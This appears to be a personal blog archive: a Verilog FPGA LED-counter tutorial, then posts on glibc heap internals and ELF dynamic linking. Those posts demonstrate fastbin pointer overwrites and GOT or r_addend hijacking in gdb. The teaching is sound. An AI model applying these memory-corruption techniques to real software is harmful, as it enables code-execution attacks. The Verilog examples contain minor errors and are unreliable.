If you think about how binary numbers add up you can see that this means it will slowly bubble up the bit values, floating the carry up the 25 bit places until it hits the 20th one. This is much slower than the raw clock, which flips up n down at 50Mhz which is like a bajillion times a second your eyes won't even see the LED move its so fast. So we basically tell the clock to add up its flips in a total and when we are happy with the amount we tell the LED to turn on! I hope that makes it easier to understand! What this means is obviously we can control how fast the LED appears to pulse, we can make it pules faster and slower, we can even make multiple LEDs on the board pulse at different rates if you want to give yourself a tension head ache lol but its fun!

8 bit led counter and split counter

It can be abit hard to get examples If you understand how the clk_div trick works then you essentially know how to build a counter already. All you need to do is make a counter for the led's. But there's one caveat, and that is again the issue of blinking the LED on and off too fast. To solve this we just divide the clock, and then add only when the clk_div[20] reads a 1. If we then map the counter to the LEDs, jobs done!

Here's the Verilog:

module mojo_top( /*module declaration*/
input clk, //clock input @ 50 MHz (according to ucf file)
input rst_n, //reset input
output [7:0]led //array of LEDs on the Mojo Board
);

reg [25:0] clk_div;
reg [7:0] led_dff;
assign led[7:0] = led_dff[7:0];
always @ (posedge clk) begin
clk_div <= clk_div + 1;
if (clk_div[20:0] == 0) begin
led_dff <= led_dff + 1;
end
if (rst) begin
led_dff <= 0;
end
end
endmodule

You can also split up the counter by making the lower bits "add" up to the high bits like so:

module mojo_top( /*module declaration*/
input clk, //clock input @ 50 MHz (according to ucf file)
input rst_n, //reset input
output [7:0]led //array of LEDs on the Mojo Board
);

wire rst = ~rst_n;
reg [50:0] clk_div;
reg [2:0] dff_1; //d-flip flop for led's
reg [2:0] dff_2;

assign led[1:0] = dff_1[2:0]; //assign first two bits
assign led[3:2] = dff_2[2:0]; //assign second two bits
assign led[6:4] = dff_1 + dff_2; //save total
assign led[7] = clk_div[20];

always @ (posedge clk) begin
clk_div <= clk_div + 1;

if (clk_div[24:0] == 0) begin
dff_1 <= dff_1 + 1;
end
if (clk_div[27:0] == 0) begin
dff_2 <= dff_2 + 1;
end
if (rst) begin
dff_1 <= 0;
dff_2 <= 0;
end
end
endmodule

In this example I also made them add at different speeds you can of course make them all tick the same way but that would be kind of lame. Anyway that's it for this one, let me know if I got some stuff wrong, I'm going to keep posting about other boards n blinky lights. Stay tuned!

Reading and References

Register Transfer Level (Wikipedia) - https://en.wikipedia.org/wiki/Register-transfer_level
Field Programmable Gate Array (Wikipedia) - https://en.wikipedia.org/wiki/Field-programmable_gate_array
All about FPGAs - https://www.eetimes.com/document.asp?doc_id=1274496
HyperPhysics : The D Flip Flop - http://hyperphysics.phy-astr.gsu.edu/hbase/Electronic/Dflipflop.html
Logic Levels - https://learn.sparkfun.com/tutorials/logic-levels/all
"What is the meaning of Active high and Active low in digital circuits" https://www.quora.com/What-is-the-meaning-of-active-low-and-active-high-in-digital-circuits-and-logic-design
Electronic Tutorials : The Multiplexer https://www.electronics-tutorials.ws/combination/comb_2.html
Mojo V3 (Alchitry) - https://en.wikipedia.org/wiki/Field-programmable_gate_array
Mojo V3 (SparkFun) - https://www.sparkfun.com/products/11953
Mojo V3 (Amazon) - https://www.amazon.com/Mojo-V3-FPGA-Development-Board/dp/B0752XX7G6
Verilog (Wikipedia) https://en.wikipedia.org/wiki/Verilog
IEEE Standard for Verilog Hardware Description Language : Standard 1364 https://www.eg.bucknell.edu/~csci320/2016-fall/wp-content/uploads/2015/08/verilog-std-1364-2005.pdf
Verilog Module Structure (Wikibooks) https://en.wikibooks.org/wiki/Programmable_Logic/Verilog_Module_Structure
Verilog Always @ Blocks - https://class.ece.uw.edu/371/peckol/doc/Always@.pdf
Introduction to Verilog - http://www.doe.carleton.ca/~jknight/97.478/PetervrlK.pdf
Best Practices for FPGA Development - http://www.irtc-hq.com/wp-content/uploads/2015/04/Best-FPGA-Development-Practices-2014-02-20.pdf
Frequency Divider Circuit (Tutorials Point) https://www.youtube.com/watch?v=nL8u0YBhyWg
Modular Monthly: Clock dividers & multipliers (Future Music Magazine) - https://www.youtube.com/watch?v=ilo52K8Oje8
Your first FPGA program (nandland) - https://www.nandland.com/vhdl/tutorials/tutorial-your-first-vhdl-program-part1.html
Xilinx Constraights Guide - http://www.fdi.ucm.es/profesor/mendias/DAS/docs/cgd.pdf
Altering the FPGA clock frequency of the Mojo (Smolloy.com) https://www.smolloy.com/2016/01/altering-the-fpga-clock-frequency-of-the-mojo/
Arty FPGA 01: Hello World with Verilog & Vivado - https://timetoexplore.net/blog/arty-fpga-verilog-01
https://www.edaplayground.com/
LEARNING VERILOG FOR FPGAS: THE TOOLS AND BUILDING AN ADDER - https://hackaday.com/2015/08/19/learning-verilog-on-a-25-fpga-part-i/
A Verilog HDL Test Bench Primer - https://people.ece.cornell.edu/land/courses/ece5760/Verilog/LatticeTestbenchPrimer.pdf
Icarus + GTK Wave Guide http://inf-server.inf.uth.gr/~konstadel/resources/Icarus_Verilog_GTKWave_guide.pdf
http://iverilog.wikia.com/wiki/GTKWAVE
Verilog and Number Litreals - http://web.engr.oregonstate.edu/~traylor/ece474/beamer_lectures/verilog_number_literals.pdf
What's the deal with Verilog's reg's and wires - https://blogs.mentor.com/verificationhorizons/blog/2013/05/03/wire-vs-reg/

Glibc Heap Exploitation Basics : ptmalloc2 internals (Part 2) - Fast Bins and First Fit Redirection

2018-12-14T00:06:00.001-08:00

This post is part of a series, check out the others in the series here:

Introduction to ptmalloc2 internals (Part 1) - https://blog.k3170makan.com/2018/11/glibc-heap-exploitation-basics.html
(this)

As I mentioned in the previous post the heap management will keep meta-data about the free chunks in case these chunks can be reallocated. To improve my language from the last post as well I should mention that there are different kinds of lists to manage different sizes of free chunks, namely:

Unsorted Bin - This is basically a list that is meant to temporarily hold any chunks that don't fit into the Fast, Large or Small bin categories. To quote some random persons paper about this:

When freeing chunks not in the range of fastbin, they are inserted into unsorted bin at first rather than the small bins or large bins - https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf

Small bins - again, as with many things this is just another list or group of lists for holding a particular size of free heap chunk. The threshold may vary per architecture and glibc implementation or even build. But the basic idea is that they are larger than Fast Bins but Smaller than Large Bins. I will dig into these with fair amount of detail in future posts
Large Bins - for chunks bigger than a maximum size, they are pretty illusive to me at the moment so I'm going to leave these out for a later post as well.
Fast Bins - the star of the show, for all free chunks in a range of sizes below a certain maximum (more details to follow shortly!)

Fastbin'd chunks are chosen to be covered here because they work as extensions to the base malloc_chunk format used for plain old unsorted or "normal sized" heap chunks, and they offer a couple of cool tricks to try out as well! So no large chunks in this post just yet (sorry about that) - but I will give them a look once I get enough data ;) Anyway, on to fastbins!

Fast Bin Format

The fastbins are just a "chunk" yard of unloved memory

Fastbins are reserved for small memory objects (small structs and strings). The idea is that if you are not using chunk sizes that will benefit from the usual compute overhead and accounting information; you just use a simple list of small memory regions that fit the size requested. Fastbins are according to some research present in the heap as a collection of different sizes of fast bins (so not just a single list is possible, multiple fastbins could be operating for each size group), to quote:

"Fastbin is a special design optimized for performance and cache locality. It is a single linked list similar to look aside table of Windows, in which free chunks of same size are linked in a LIFO way. Chunk size of different fastbins varies. There are [totally] 10 fastbins in an arena yet the first 7 are used by default, ranging from 16 to 64 bytes on 32-bit systems or 32 to 128 bytes on 64-bit systems" - https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf

Another caveat is that fastbins are not coalesced if they are free'd; this is again to save spinning the wheels over such small regions. There's much more about fast bins in the documentation in glibc-[version]/malloc/malloc.c is fantastic and I full suggest giving it a read through - I'd hate to blindly copy it here.

That's pretty much the opening blurb on fastbins lets get into what they look like and how they work.
The size threshold defined for fastbins defined in malloc/malloc.c: As it stands in glibc-2.23 its defined as MAX_FAST_SIZE =(SIZE_SZ*80)/4, which will evaluate to 80 bytes. So anything below 80 bytes will pretty much end up getting fast bin'd.

To provide a good example of the format; here's a chain of fastbins in memory:

I've grabbed an example screenshot here that also compares a non-fastbinned chunk, just a plain old chunk 0xb0 bytes in size (the first one allocated with a mem pointer at 0x602010) - this is to show the difference between formats a littler clearer.

On the left you see the "live" fastbin'd chunks (starting at the 0x6020b0) . Nothing really gives them away as fastbins in this state except for their sizes. On the right you will see the free'd fastbin'd chunks; a key thing to notice here is that they have a single back-pointer (forming a linked list of fastbin chunks) indicating where the next free fastbin'd chunk is.

What you will notice as well is that we definitely have the case here that fastbin'd chunks next to each other in memory are free'd; but none of the size fields overlap or rather none of the chunks are joined together. As mentioned before they will not be coalesced.

Okay so we know what they look like, lets talk about another important mechanism, the fastbin first fit.

Fastbin First Fit

The fastbins have a slightly different reallocation dance, they sit inside an Last In First Out (LIFO) queue when issued for reallocation. What this means is; if we were to free them one after the other in series; the first one returned for re-allocation; would be the last one free'd in the series.

In the screenshot below; the memory dump on the left shows the state of the heap just before a malloc is called and after all the fastbin chunks have been free'd. On the right is the heap after the second malloc (or reallocation) has been called. So we should essentially see which fastbin chunks get returned and used and in which order (mostly because I wrote some info into the heap chunks using the program - each allocation writes 0xAA, 0xBB into the heap in the order they are allocated in):

You should be able to pretty easily work out which chunks came back first. Also please keep in mind the pointers showing up on the free list; these 0x602yyy looking values in the heap chunks are the malloc_chunk->bk pointers.

The next question you will naturally ask is how do we make it returned a pointer we want, or how do we influence free chunks lets say, to force a certain free chunk to be returned? What happens when we overwrite this information "in flight" and then see which fastbin is returned? Well here's a recipe for testing this out:

Free up some chunks
Re-point the malloc_chunk->bk pointers of the fastbins
Check out which of the available chunks get 0x4242 written into them (again this 0x4242/0x4141 stuff is purely because I'm making the program pain the heap helpfully for me)

Lets see what this looks like:

So just to explain. First I overwrite the bk pointer with the set {size_t} 0x602100 = 0x0000000000602000 command; which essentially tells the heap that after the first fast bin is returned (the first one in the LIFO at 0x6020f0) it should follow the linked list to the "next" free fastbin which is at 0x0602000.

The next screenshot shows how allocation was redirected; instead of allocating the next chunk just above the bottom most one, it jumps all the way to the top:

One can clearly see, we just redirected the heap reallocation! The linked list powers belong to us now!!

You can also redirect the heap to a fake chunk somewhere else in a writeable-readable portion of memory. To do this the following needs to be done:

Free up all the fastbins
Just before the first re-alloc; Re-point the fastbin that's going to be first fitted to your fake fastbin like so for instance: set {size_t} 0x602100 = 0x601050 (this sets the bk pointer of the chunk at 0x6020f0)
Set the size of the fast bin to something acceptable, here I'm just recycling the same size as the one being replaced, like this: set {size_t} 0x601058 = 0x0000000000000051

The below screenshot shows that this was achieved. We can see a weird heap chunk hanging out in the 0x6010yy address region while the rest of the chunks are at 0x6020yy range:

This is not a full on security exploit, but it definitely inches us closer to one. And it also introduces an important little trick for getting the heap to do reliably weird things lol.

This is pretty much it for this post, I'll covering more heap meta-data in the next post. Stay tuned!

References and Reading

Glibc Heap Exploitation Basics : Introduction to ptmalloc2 internals (Part 1)

2018-11-25T00:10:00.001-08:00

In this post and the others in this series, I will unpack some of the internals to glibc's dynamic heap data structures and associated beasts. This post specifically will start you off with no background insight on the heap (perhaps a little on ELF internals and debugging), and detail some experiments you can perform to learn how the heap works.

Introduction

The Heap is essentially a list of memory regions an executing program uses to store data. The data stored in heap regions are requested during runtime. It allows runtime environments like glibc to offer programs dynamic memory for allocating data. So because this offer's memory regions as kind of a "service" (this is what it is for - giving out memory regions), it must mean some where in this whole mess, there needs to be some accounting information about the memory regions. To this aid; the heap describes or decorates user data regions with an internal structure called a chunk. Chunks are in turn classified and grouped according to their properties - basically properties like:

whether they are available for use,
how big they are,
and which chunks are around them in the list and other wonderful things.

The big TL;DR for heap management is that its basic movement will essentially be to perform elaborate dances around the functions of searching through chunks either to free or allocate them.

The heap allocator I will focus on here is glibc version ptmalloc as implemented in versions glibc 2.23-2.28. But this of course not to say that only glibc is important to understand; there exists multiple approaches to heap allocation. Each approach is unique down to how they achieve various operations; like coalescing free chunks, sorting and searching free chunks and grouping them rapidly, as well as amongst perhaps even more things - security improvements. So there's a number of places that complexity can breed and fester into security problems. But the root of these problems will often be in how users requesting data, and the allocator managing data respond to meta-data about memory regions.

To close the introduction, Heap can often seem very intense and complex and have very gnarly internals, but most of which; aid memorization and other computer science that serves to speed up searching linked lists. Another way you can say this is that; they are nothing more than elaborate ways to store some "cheat" meta-data that doesn't require searching the whole heap memory area for stuff every time. But the meta-data is interesting to us because there are instances when we want to influence the way the list is searched and interpreted.

Heap speak

The basic unit of currency for the heap as you would have guessed is a chunk. We probably want to know what these look like in glibc code, so here ya go:

I should give each field its fair explanation (well as fair as I can be to it):

INTERNAL_SIZE_T - is something I should probably explain, this is a size type, for the fields that define "bookeeping" functions in the heap management - stuff like pointers (addresses) and bit fields. This size definition that is left to be implementation defined. We can imagine that glibc would want to be portable and flexible across different hardware's and runtime implementations - so address sizes mapped to INTERNAL_SIZE_T can (but I don't think often do) vary. Anyway, the INTERNAL_SIZE_T is defined to be size_t - which falls back onto how ever your C runtime originally solved the problem.
mchunk_prev_size - is the very first part of a chunk format and this is used whether its a free or used chunk. This field indicates the size of the chunk just before this one, and its least significant bit is set to 0x1 if the chunk referred to, is free. So if you are looking at a chunk, and its prev_size has a least sig bit of 0x1, just before this is a chunk that is still "alive".
mchunk_size - pretty standard, actually just holds the current size in bytes lol.
struct malloc_chunk* fd - so this is a field in the chunk struct defining a space for an address to another chunk. This is because it forms a linked list. This linked list being defined here is the "free list", which snaps together all the chunks that are free on the heap. Here we are defining the "forward pointer" in the linked list.
struct malloc_chunk *bk - you guess it, this the same type as the previously mentioned field, we are here just talking about the "backward pointer".
struct malloc_chunk *fd_nextsize - so this field is from another layer of free listing tech in the heap. This pointer is added to a free chunk if its above a certain size threshold (we will cover this later on) - so that the heap manager can track huge chunks should they appear. Its kinda like being a high roller in a casino, when you come out they track your movements and wants even more intensely because you affect the profitability of the evening more.

So we'd probably also want to get a look at what this looks like in execution, see what different kinds of chunks look like (free vs allocated) . We want to be able to understand the base language of the heap internals, before taking part in the conversation. So lets run a simple C program through gdb, and unpack the heap to show how it responds internally. The program I'm going to be looking at is the following:

I know its a bit long winded you can totally skip over the other mallocs and free's if you don't want to go through each one. I added them here to give my examples and reversing some more interesting data.

In the code above I've added a simple make shift "wrapper" function (my friend Galen gave me this idea) and injected a break point just before the last return. This so that I can isolate the free and malloc calls effects on the memory regions we are studying.

And now lets see what happens to the heap as it allocates memory. We need to find a pointer to the heap first. This is pretty easy since malloc will save it in rax after returning back to the main function, I show this in the first few gdb commands:

So as I have it set up the hook-stop will just spit out everything around $rax-0x10 which is the address where the chunk header information will be saved. I do this because; when we hit this break point malloc will have just returned at set the register to its return value - which will be the address of the memory region allocated. We can see directly how these macros operate on heap metadata data in glibc/malloc/malloc.c:

So as you can see its a simple addition or subtraction of 2 addresses to get the mem (raw memory pointer to where user data starts) or the chunk information starting two addresses before. There are a number of other operations that extract and set other meta-data.

Okay so that's the basic format pretty much covered lets look at how this looks in action.

Growing heap the natural way

After the first break point hits you should see gdb display the first heap chunk allocated, here's an annotated version of that dump showing the heap format:

Now after this hits your screen, try executing the "c" gdb command to skip to the next break point. You will get a couple more examples of allocated chunks until you see the following on your screen:

This is essentially showing that we can't use the value in $rax as before in the hook-stop. As you would guess this is because $rax does not hold the memory pointer anymore, its now embroiled in a free call so it hold some other value. Anyway, we can dump the chunk using the address passed to the free_string function since it is conveniently displayed here for us. This is what the chunk looks like after it was free'd:

What is shown in the screen dump above in addition to the free chunk is where the first free chunks fd (free list forward) and bk (free list backward) pointers go. We can see here if we follow them using gdb's memory examiner functions they eventually end up at 0x602a00 which is the top chunk's address; the pointer to the top of the currently allocated heap addresses.

Okay so that's what a chunk looks like when its allocated and free'd, can we have a look at how chunks are coalesced into bigger free chunks? Yes that's what the next section is for!

Free Chunk Coalescence

After allocating the chunks, our program will free up each one in the same order they were allocated in. Now what this means is that we can expect two chunks allocated next to each other; to be free'd right after each other as well - and as a result we will have two chunks that get melded into one.

Here's what that looks like:

What we can see on the left of the screen dump; is the two chunks (named chunk 1, and chunk 2) at addresses 0x602580 and 0x6024a0. On the right we have the new coalesced chunk at 0x6024a0 of course, but this time we can see that the size field after coalescing is 0x211 (which as indicated is simply 0xe1 + 0x130).

This is pretty much all there is to this coalescing action really. And thats pretty much all I have for this post, I'll continue this series by moving onto fast-bins, large chunk management and potentially some heap redirection tricks. Stay tuned for the next one folks!

References and Reading

Check out the following to see some inspiration for this post and more awesome things to find out about the heap works.

https://sourceware.org/glibc/wiki/MallocInternals
http://phrack.org/issues/66/10.html
http://www.phrack.org/issues/68/13.html
https://github.com/shellphish/how2heap
https://www.blackhat.com/presentations/bh-usa-07/Ferguson/Whitepaper/bh-usa-07-ferguson-WP.pdf
2007 BlackHat Vegas V82 Ferguson Understanding the Heap 00 - https://www.youtube.com/watch?v=VLnhV1T5Ng4
The Heap: what does malloc() do? - (bin 0x14) - https://www.youtube.com/watch?v=ZHghwsTRyzQ
ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps
https://www.cs.tufts.edu/~nr/cs257/archive/paul-wilson/fragmentation.pdf
https://www.blackhat.com/docs/eu-17/materials/eu-17-Heelan-Heap-Layout-Optimisation-For-Exploitation-wp.pdf
http://g.oswego.edu/dl/html/malloc.html
https://fossies.org/linux/glibc/malloc/malloc.c

Introduction to the ELF Format (Part VII): Dynamic Linking / Loading and the .dynamic section

2018-11-09T01:08:00.002-08:00

This post is part of a series on the ELF format, if you haven't checked out the other parts of the series here they are:

(Part I) : ELF Header https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html
(Part II) : Program Headers https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html
(Part III) : Section Header Table https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html

and many more!

So in this one I'm going to talk a little bit about how dynamic linking works. I'll unpack some useful things to know about how functions are executed when dynamic linking/loading is in effect.

Overview of dynamic linking

As you would imagine; there are some ingredients to the dynamic linking magic, namely the procedure linkage table,the global offset table and the .dynamic section. I'm going to layout some basic GOT and PLT theory, and then later on in the post I'll back up all this wonder full theory with some disassembled code and gdb screen dumps! So anyway, getting back into it...

The Procedure Linkage Table (PLT) (its actually more like a list of code stubs) is a rough landing area for function calls to hit as a first stop in their dynamic linking journey. The PLT either branches directly to the function definition it needs (by referencing the relevant entry in the Global Offset Table) or sets up a call to the run time to sort it out (along with some other parameters we will see later on!). A better name would be something like a "Procedure linkage function chain" because its actually just a contiguous region of code with a little run time invoking stub at its "head".

The Global Offset Table (GOT) holds values that are meant to point directly to the intended definition - its essentially the "final destination" of a function call. As mentioned above this table is used as kind of a de-coupled reference table for the PLT. This is amazing for exploit deve-uh I mean compiler extension development; because it means if you can achieve simple address wide overwrites you can do a lot by targeting the GOT, in terms of possessing execution flow.

The runtime's end goal is replacing the GOT entry for the called function with its correct value. The PLT entries that trigger when a function calls; preps some arguments the runtime needs to resolve the particular GOT entry. These arguments include the link_map for the given object and its index in the dynamic symbol table.

So we're going to look at how each of these data-structures work and show simply where you can replace values to subvert execution flow (depending on how you achieve the write of course).

ELF Link Maps

As much as I wish this was literally a map of elf's named link, (breath of the wild reaccs only); link_maps are essentially small data structures that hold a couple pointers to some meta-data needed for completing some dynamic linking action. They are essentially shuffled around the internals of the runtime and dynamic linker; and other shared object handling things. link_map structs are passed directly to the function that invokes the dynamic linking action _dl_runtime_resolve_* (there are some caveats to this depending on os and arch I believe). So they are actually more like little maps that link in the ELF symbol gods. Anyway here's what they look like:
extract from elf/link.h:

The fields are pretty much documented well, as far as I can see they really do behave as described.
We can though confirm some of these details through some light data collection and debugging. Here's a demonstration of how the l_next and l_prev field's work:

So essentially each link_map ends its record with these values, they contain address for finding the next element in the list and the previous. Don't see anything just yet but; I'm looking out for things that make use of the l_next and l_prev elements in a turing completey way ;)

There is one other field would like to expand on here namely the l_ld, this is the reference to the .dynamic section entry for this function. And as you guessed it means we will probably need to talk about how the .dynamic section works.

The .dynamic section

The dynamic section essentially holds a number of arguments that inform on and influence parts of the dynamic linker's behavior. This is because as a component of the runtime, the dynamic linker does many other things besides just relocate functions it also executes other house keeping functions like INIT and FINI. Here's what the entries of the dynamic section look like according to glibc:
extract from elf/elf.h:

This is simply a list of two address values, one for indicating the type of dynamic section entry (d_tag) and one for the actual value of the entry (d_un). We have some strange union type here because it allows arbitrary information instead of just addresses. Take a look at this hexdump example to see how the value's can vary for the d_un field:

Okay so that's the link_map and .dynamic section done we can move onto looking at what happens when a function is resolved and how this affects the GOT.

Runtime lazy loading up close

To get functions resolved without preparing all the relocations up front, the ELF format and dynamic linker use a mechanism called lazy loading. Lazy loading essentially means resolving and patching up the GOT entries for a function when it is called. This is obviously so that subsequent function calls do not need to involve the dynamic linker / runtime (in a previous post i showed explicitly how the dynamic linker kicks in again if you mess with some other meta-data).

Okay so lets see if all this cool theory is true in practice. How are we going to see what the runtime does with the GOT? Well to lay out a simple methodology:

Find a pointer to the top of the PLT (I will also cover some structuring of the PLT to show you where the "top" is)
Once we have the PLT we can then find two things 1) the GOT entry for the function being called and 2) a break point to set before the GOT is edited (namely the entry point of the runtime)
Set a break point to a function
Compare the GOT values before and after.

First step is to find a pointer to the top of the PLT, lets take a look at an annotated dump of a binary's _start and PLT sections (I disassembled _start because in order to call _start_main it needs to involve the PLT as well):

So we can see from the picture that at instruction 0x400534 a call to the PLT entry of __libc_start_main is made. This then ends up doing a couple things:

0x4004e0 jumping to 0x601030 the GOT entry for __libc_start_main. This is because when the linker is does lazy loading; the first instruction will hit the function directly if the GOT has been patched but upon first call this is always the next instruction after the jump - so its effectively a jump to the next position in the PLT.
0x4004e6 pushing a number onto the stack - this is the index of the relocation entry that applies to this action, the dynamic linker needs this to do its job.
0x4004e6 jumping to the head of the PLT which invokes the dynamic linker directly.

Okay lets see what the PLT looks like in its full glory:

And so we can see a format for the PLT forming, namely every entry has these base elements:

jump to the GOT
push reloc index
jump to PLT head (_dl_resolve_runtime*)

The head contains some interesting code. We can see at instruction 0x4004a0 some value gets pushed onto the stack before it jump's off to the dl_runtime_resolve at instruction 0x4004a6. Whats happening here is the link_map for the object (libc.so, libsecurity etc etc) that holds the symbol involved in the lazy loading is being passed to the dl_runtime_resolve function as an argument.

We can dissect this link_map through different calls to the dl_runtime_resolve to see that it is actually always the link_map object. Knowing that the link_map must contain a pointer into the dynamic section; so if we see dynamic section approximating values in the area round the pointer being passed to dl_runtime_resolve it is most likely a link_map object. Or I should rather say: if it appears there whatever it is - dl_runtime_resolve will treat it like a link_map object.

So lets see what these values look like as they are flying into the resolve call:

I can also show that the GOT in fact does get patched with new values as the runtime gets called. Here's a screenshot showing this for the puts resolution:

After the second break point at 0x4004a0 hits (which is the setup code for the call to dl_runtime_resolve) we can clearly see some new entry in the GOT at address 0x601020; the update adds the address 0x7ffff7a7c690 which we can see from symbol information in the debugger is the _IO_puts function! GOT entry correctly updated.

Okay that's pretty much it for this post. In later posts I may talk a little about how to abuse this lazy loading mechanism to achieve execution of other functions - some cool tricks. For now I thought I'd keep it short and only explain some main concepts here and leave the advance sorcery and ELF black magic for future posts. Stay tuned folks!

References and Reading

Some stuff I read and relied on to make this post. Very useful information here!

Introduction to the ELF Format (Part VI) : More Relocation tricks - r_addend execution (Part 3)

2018-10-22T18:34:00.000-07:00

So I lied a little about what would be the next in the series, I realized there was something I should have added to the previous one - which ironically was the addends about the r_addend field :) So here it is, the section on mangling r_addend fields with some other tricks I left out.

Some things you might need are:

Executable code we will disect, tihs is the definition for the never_call.c https://gist.github.com/k3170makan/c7712b7aa14f1c2e7c0e7ae725f2fac1
binutils
GCC

An average linux distro will have these things already ready to roll besides maybe hexedit/hexdump.

Mangling dynamic symbol relocation r_addends

r_addend you glad it didn't say 0xAAAA...?

In the previous post, I mentioned the basics of the relocation entry format and showed how complex they can become and how one ELF object can have a bunch of different .rela.[name] sections. All of which will not only have relocs applied to different stages of the ELFs life cycle, for instance calling functions but can also help the runtime perform initialization. For the first example we are going to focus on the .rela.dyn section and what happens when we are too liberal with the values in the r_addend.

The r_addend if you weren't aware; is a field in relocation entries for ELF symbols that specify an additional auxiliary parameter to a relocation calculation. I also mentioned that this field is not actually used much on the x86_64 platform and for the most part (as far as I can see) - is nulled out. So you will have a .rela.* ('a' meaning with r_addend) sections to your binary, it will just always have its r_addend fields set to 0 most of the time.

Poking and prodding these r_addend fields as they appear in some binaries; I found is that you can actually get the run-time to execute from the r_addend value if you made it non-zero. Here's the proof of concept:

In this screenshot I am changing the value for __gmon_start__(2)'s relocation r_addend which appears at address 0x3B0. Its not so important where it gets called, I am pretty sure its just after _start and before the main method.

Whats good to know about that is that according to that theory the never_call function should in no way ever be called - we can pretty much bet there is no simple logical progression leading to never_call's execution, this is because the code for this binary is only written to print two strings and then exit.

Now, you should check the readelf output as well (in the screenshot); it confirms that we are changing this field correctly. Also notice that we have only edited the .rela.dyn's r_addend value for this field; meaning the actual symbol value for __gmon_start__ is untouched in both the dynamic symbol table (.dynsym) and full symbol table (.symtab).

This pretty much does straight up execute the r_addend value, I've confirmed this in many other ways (for instance we can see that the segfault happens at this instruction point value consistently):

It is of course implied that I am forcing it to take the completely unnatural instruction pointer values of 0xaa.. 0xbb... etc.

This behavior is isolated to a couple of relocation types (r_types). I furthered my investigation into which r_types allow for this in some capacity, and I got execution by using the following relocation types:

R_X86_64_64 0x01 - Direct 64 bit Reloc
R_X86_64_IRELATIVE 0x25 - Adjust indirectly by program base
R_X86_64_RELATIVE 0x08 - Adjust by program base

I'll get into deep detail about exaclty why these end up getting executed but its going to take a little more research before I can confidently talk about that lol.

We know of course the rela sections will appear in the live memory image (this is because they form part of a PT_LOAD section(1)), so we know that it will potentially be "referencable" from inside running code. This means it offers data to target that could potentially affect execution flow.

Footnotes

Not directly because the section they appear in is marked ALLOC as some would refer to it.
which is to cut a long story short afaik a profiling function that gets called during the runtime initialization from the _init().

References and Reading

This post is part of a series on the ELF format, if you haven't checked out the other parts of the series here they are:

(Part I) : ELF Header https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html
(Part II) : Program Headers https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html
(Part III) : Section Header Table https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html
(Part IV) : Section Types and Special Sections https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html
(Part V) : C Start up https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html
(Part VI)

The Symbol Table and Relocations Part 1 https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-vi.html
Symbols and Relocs Part 2 https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-vi_18.html
(Part VI) : this

So if these sound like another language to you, try starting a little further up in the chain ;)

Introduction to The ELF Format (Part VI): The Symbol Table and Relocations (Part 2)

2018-10-18T20:40:00.000-07:00

This post is part of a series on the ELF format, if you haven't checked out the other parts of the series here they are:

(Part I) : ELF Header https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html
(Part II) : Program Headers https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html
(Part III) : Section Header Table https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html
(Part IV) : Section Types and Special Sections https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html
(Part V) : C Start up https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html
(Part VI) : The Symbol Table and Relocations Part 1 https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-vi.html
this

In this post I'm going to explain a little bit more about how Relocations and Symbols work. We talked about the symbol table specifically in the previous post, but weren't fair about why Relocations are needed and who they are used.

Introduction

"The real is what resists symbolization absolutely" - Jacques Lacan (1)

When compiling and linking a program; the attributes used in each component object is placed at a given offset away from its original position in the final object. The ELF format records this offset and a mechanism for its resolution in Relocation records. Relocation records hold information used by various utilities to help aim at the right part of the Elf file containing the definition of a symbol. It also allow compilers and C developers to extend the functionality of symbol resolution - with extra hooks and plugins and what have you, so like exploit dev but except you actually want to write to a function pointer with data lol. So symbol information, but for symbols themselves!

Relocations can take on a number of types subsets of which are colloquialized and implemented across architectures - so many archs will have their own symbol resolution mechanisms applied to the relocation record format discussed here. Besides this already sparse field of definitions; relocation records (referred to as "relocs" from here on out...sometimes) are used for various reasons through a programs life cycle. Some relocs are used to prep the runtime, others for plain old dynamic linking and lazy loading and there may very likely be more yet defined and unmentioned functions.

Lets take a look at how this Relocation format works and which sections are meant to hold information for it.

The Relocation Table (.rel, .rela.dyn and friends)

To give an overview of how complex these fields are here's a small cheat sheet:

So as we know the section header table will be able to point us at different parts of an ELF file and elaborate what they are meant for. Some section headers mentioned here are specifically for holding relocation information; and because relocation as we said can have multiple purposes, there are multiple relocation sections. The naming scheme should be pretty much the same in that it mentions more or less what its relocation entries are for in the .rela.[name] scheme:

.rel.dyn .rela.dyn - relocation entries for dynamic symbols
.rel.plt .rela.plt - relocation entries for PLT meta-data (usually prepping JMP gadgets)
other types exist but I find they are rarely used or hard to find examples for.

rela with an "a" at the end; indicates relocation with the addend fields are used in the section. Relocation with addend is the one commonly used on x86_64 it seems; although the actual r_addend field is almost always 0 - glibc also maintains some flags to configure whether this field is used as part of the relocation.

Basically that means, you will see relocation with addends used in "format"; but the actual addend will most likely always be set to 0. Which is more effectively just a normal reloc but with a NULL word at the end of each one. Potentially useful depending on how code trusts that NULL at the end when it loops through records.

Anyway, seeing that there could be a number of different rela.[name] fields down to just about any crazy purpose I decided to go looking for some weird [name] values . So I scanned my own machine quite liberally for ELF objects and found that few of them use any wilder form of .rel section - compared to the common rel(a).dyn, rel(a).plt:

The .fffff sections are from me doing research for this blog series but I freaked out a little when I saw them at first lol

Moving on, we should probably look at the struct the C runtime and glibc use to handle Relocation records:

(extract from glibc-2.28/elf/elf.h)

This is what I've gathered each of the fields in the struct are meant for:

